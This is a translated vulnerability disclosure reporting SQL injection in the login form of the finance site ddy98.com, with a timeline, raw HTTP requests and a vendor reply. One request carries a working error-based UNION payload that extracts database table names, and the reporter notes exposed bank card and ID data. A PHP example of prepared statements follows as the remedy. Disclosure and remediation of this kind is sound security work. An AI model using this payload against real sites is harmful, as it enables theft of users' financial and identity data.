2015-09-29: Details have been sent to the vendor and are awaiting the vendor's handling. 2015-10-12: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Diandianying Internet Financial Services (Hangzhou) Co., Ltd. is the internet financial services company of Hangzhou Kedi Capital Group Co., Ltd.; it develops, operates and manages the Diandianying [www.ddy98.com] integrated internet finance platform. The company's senior management team and advisors are made up of Chen Gang, Huang Xiaojie, Chen Yu and other veteran experts from the finance and internet industries. As a professional internet finance platform, Diandianying takes online securities brokerage as its main direction of development and is committed to providing the public with internet financial services including online brokerage and online sales of standardized financial products; combining years of asset-management and risk-control experience with advanced information-processing technology, it continually offers investors safer, richer and more convenient internet financial products. Anything involving Grandpa Mao (cash) can't just be left alone, right..
POST /index/signin HTTP/1.1
Host: www.ddy98.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.ddy98.com/index/login
Content-Length: 84
Cookie: Hm_lvt_c517ee8dbbab228796b220f53a8f8463=1441118424,1441154686; CNZZDATA1256207110=2039958451-1441117427-%7C1441160243; PHPSESSID=ol5jbebst3h2gaiqrbkpcic933; Hm_lpvt_c517ee8dbbab228796b220f53a8f8463=1441160341
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

username=15656565656&passwd=vfdsbfds&ytoken=796bac1af7ed162b7c3df6ea8c8cc34060646203

The username parameter is injectable (SQL injection in the login request):
POST /index/signin HTTP/1.1
Host: www.ddy98.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.ddy98.com/index/login
Content-Length: 286
Cookie: Hm_lvt_c517ee8dbbab228796b220f53a8f8463=1441118424,1441154686; CNZZDATA1256207110=2039958451-1441117427-%7C1441154494; PHPSESSID=ol5jbebst3h2gaiqrbkpcic933; Hm_lpvt_c517ee8dbbab228796b220f53a8f8463=1441154686
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

username=1 union select exp(~(select*from(select group_concat(distinct table_name) from (select * from information_schema.columns group by table_name having table_schema=database() limit 1,40)a)x)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1#&passwd=ss&ytoken=8dc819e1e284f808185e2f3abc78d23c286b4b42

There also seem to be all sorts of bank card numbers, user phone numbers and ID card numbers.. didn't look closely, leaving it at that.

Fix recommendation: filter the input.
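Input filtering alone is fragile for a login query; the durable fix is to keep the username out of the SQL text entirely by binding it as a parameter. The following is an added example, not code from ddy98.com (whose backend is not public): a login lookup written by string concatenation next to the same lookup as a PDO prepared statement. It runs against an in-memory SQLite database so it needs no external service; the users table, its column names and the sample account are assumptions constructed for the demonstration.

```php
<?php
// Added example, not the site's own code. Table/column names are assumed.

function makeDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, pw_hash TEXT)');
    // Constructed sample account; the stored value is a hash, never the password.
    $ins = $db->prepare('INSERT INTO users (username, pw_hash) VALUES (?, ?)');
    $ins->execute(['15656565656', password_hash('correct horse', PASSWORD_DEFAULT)]);
    return $db;
}

// Vulnerable form: the request parameter is pasted into the SQL text, so a
// quote or SQL syntax inside $username changes the structure of the query.
function findUserUnsafe(PDO $db, string $username): ?array {
    $sql = "SELECT id, username, pw_hash FROM users WHERE username = '$username'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened form: the value travels as a bound parameter and is never parsed
// as SQL, whatever characters it contains.
function findUserSafe(PDO $db, string $username): ?array {
    $stmt = $db->prepare('SELECT id, username, pw_hash FROM users WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Login check built on the safe lookup; the password is checked against the hash.
function signin(PDO $db, string $username, string $password): bool {
    $user = findUserSafe($db, $username);
    return $user !== null && password_verify($password, $user['pw_hash']);
}

$db = makeDb();

// A username containing a single quote: the concatenated query is no longer
// valid SQL and PDO throws, which is the symptom the report above turned into
// an information leak; the parameterized query simply finds no such account.
$input = "o'neil";
try {
    findUserUnsafe($db, $input);
    echo "unsafe lookup: no error\n";
} catch (PDOException $e) {
    echo "unsafe lookup: SQL error -> " . $e->getMessage() . "\n";
}
var_dump(findUserSafe($db, $input));
var_dump(signin($db, '15656565656', 'correct horse'));
var_dump(signin($db, '15656565656', 'wrong'));
```

Run with `php example.php` on any PHP build with the pdo_sqlite extension. The same prepared-statement pattern applies unchanged to MySQL by swapping the DSN; the point is that the query's shape is fixed at prepare time, so no value supplied in the username field can add a UNION or a comment to it.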
Severity: No impact (vendor ignored)
Ignored at: 2015-10-12 19:26
Vulnerability Rank: 4 (WooYun rating)
2015-10-13: This version was updated long ago and the vulnerability described above no longer exists, but thanks for the heads-up anyway. Please have WooYun verify and then close this report.